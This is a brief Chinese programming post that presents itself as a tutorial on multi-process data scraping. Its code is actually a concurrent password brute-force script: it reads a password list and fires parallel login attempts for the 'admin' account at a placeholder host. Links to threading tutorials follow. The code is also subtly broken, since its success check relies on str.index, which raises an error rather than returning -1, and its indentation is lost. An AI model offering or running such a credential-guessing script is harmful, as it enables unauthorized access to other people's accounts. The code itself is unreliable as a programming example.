问题:如何进行多进程抓取数据?
方法:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Pool
import requests
from time import sleep
fin = open('pass_list.txt', 'r', encoding='UTF-8', errors='ignore')
host = 'http://xxx.com/'
def topass(passwd):
print(passwd)
data = {
'Username': 'admin',
'Password': passwd,
'submit': 'Login'
}
r = requests.post(host, data=data)
html = r.text
err_idx = html.index('Password authentication failure')
print(err_idx)
if err_idx < 0:
print('Success: The password is %s' % passwd)
exit()
# sleep(1)
if __name__ == '__main__':
# 'Parent process %s.' % os.getpid()
p = Pool(20)
for passwd in fin:
p.apply_async(topass, args=(passwd,))
# Waiting for all subprocesses done.
p.close()
p.join()
# All subprocesses done.
拓展:
https://zhuanlan.zhihu.com/p/111269552 Python多线程from multiprocessing.dummy import Pool as ThreadPool
https://blog.csdn.net/a_jie_2016_05/article/details/89668723 import threading
https://www.cnblogs.com/fan-yi/p/14003998.html Concurrent.futures